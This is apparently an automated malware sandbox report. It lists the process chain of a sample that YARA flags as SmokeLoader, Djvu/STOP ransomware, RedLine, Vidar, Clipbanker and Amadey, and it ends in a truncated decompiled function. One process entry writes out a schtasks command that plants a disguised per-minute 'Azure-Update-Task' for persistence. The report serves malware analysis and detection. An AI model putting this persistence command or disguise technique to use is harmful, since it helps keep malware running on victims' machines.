Commandline:	C:\Users\user\AppData\Local\Temp\C2B9.exe
Imagebase:	0x400000
File size:	205824 bytes
MD5 hash:	B1C532EE300B4D54DC95FA6DE7406870
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000013.00000002.475648419.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000013.00000002.475973961.0000000000691000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000013.00000002.475785512.0000000000660000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.475372910.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: AF5C.exePID: 8152, Parent PID: 3452

General

Target ID:	20
Start time:	04:27:45
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\AF5C.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AF5C.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.461647833.0000000002740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.460148088.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 6C74.exePID: 8172, Parent PID: 7824

General

Target ID:	21
Start time:	04:27:45
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6C74.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.461592637.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 9B15.exePID: 5172, Parent PID: 3452

General

Target ID:	22
Start time:	04:27:45
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\9B15.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9B15.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.463476462.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000016.00000002.473987426.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: AF5C.exePID: 7180, Parent PID: 8152

General

Target ID:	23
Start time:	04:27:46
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\AF5C.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AF5C.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000017.00000002.461927815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 6C74.exePID: 3676, Parent PID: 8172

General

Target ID:	24
Start time:	04:27:46
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6C74.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\6C74.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 86ED.exePID: 2300, Parent PID: 3452

General

Target ID:	25
Start time:	04:27:46
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\86ED.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86ED.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.475860220.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.466055067.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 9B15.exePID: 3312, Parent PID: 5172

General

Target ID:	26
Start time:	04:27:46
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\9B15.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9B15.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 86ED.exePID: 1476, Parent PID: 2300

General

Target ID:	27
Start time:	04:27:47
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\86ED.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86ED.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: E8B1.exePID: 7184, Parent PID: 3452

General

Target ID:	28
Start time:	04:27:47
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\E8B1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E8B1.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.476313714.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: E8B1.exePID: 7356, Parent PID: 7184

General

Target ID:	29
Start time:	04:27:48
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\E8B1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E8B1.exe
Imagebase:	0x400000
File size:	818176 bytes
MD5 hash:	975AFF0E2D4CC02478D7ED11A94354FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7412, Parent PID: 3452

General

Target ID:	30
Start time:	04:27:53
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.476748443.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 6000.exePID: 7420, Parent PID: 3452

General

Target ID:	31
Start time:	04:27:53
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6000.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6000.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.480287492.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7448, Parent PID: 7412

General

Target ID:	32
Start time:	04:27:54
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000020.00000002.481989868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 6000.exePID: 7384, Parent PID: 7420

General

Target ID:	33
Start time:	04:27:54
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6000.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6000.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.483438291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 5036, Parent PID: 3676

General

Target ID:	34
Start time:	04:27:55
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Imagebase:	0x400000
File size:	348672 bytes
MD5 hash:	B7133C4070082747C60BF6191A5F70DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.488406614.0000000001BF1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000022.00000002.488659141.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: build3.exePID: 1812, Parent PID: 3676

General

Target ID:	35
Start time:	04:27:57
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe"
Imagebase:	0x20000
File size:	9728 bytes
MD5 hash:	9EAD10C08E72AE41921191F8DB39BC16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 88%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2064, Parent PID: 1812

General

Target ID:	36
Start time:	04:27:57
Start date:	21/06/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0xea0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1244, Parent PID: 2064

General

Target ID:	37
Start time:	04:27:57
Start date:	21/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 5012, Parent PID: 5036

General

Target ID:	38
Start time:	04:27:58
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe"
Imagebase:	0x400000
File size:	348672 bytes
MD5 hash:	B7133C4070082747C60BF6191A5F70DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000002.513851805.00000000022D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000026.00000002.509075402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mstsca.exePID: 4744, Parent PID: 1080

General

Target ID:	39
Start time:	04:27:58
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0x1360000
File size:	9728 bytes
MD5 hash:	9EAD10C08E72AE41921191F8DB39BC16
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000027.00000002.618588057.0000000001361000.00000020.00000001.01000000.00000014.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 88%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: D5B9.exePID: 7524, Parent PID: 3452

General

Target ID:	40
Start time:	04:28:00
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\D5B9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D5B9.exe
Imagebase:	0xb30000
File size:	4531200 bytes
MD5 hash:	4E40E00BE3370FB1F562B1E09E1275C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000028.00000002.499652756.0000000004275000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\D5B9.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7592, Parent PID: 3452

General

Target ID:	41
Start time:	04:28:03
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe" --AutoStart
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000029.00000002.497413015.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000029.00000002.497631299.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 7328, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	96.3%
Signature Coverage:	53.7%
Total number of Nodes:	54
Total number of Limit Nodes:	2

Executed Functions

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _EXCEPTION_RECORD _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				intOrPtr _v56;
				long _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				intOrPtr _t87;
				struct _EXCEPTION_RECORD _t90;
				intOrPtr _t91;
				struct _GUID _t97;
				struct _GUID _t99;
				long _t100;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t183;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t205;

				_push(0x387);
				_t201 = _t200 + 4;
				_push(0x83);
				L004011F5(_t175, _t205);
				_t127 = _a4;
				_t176 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
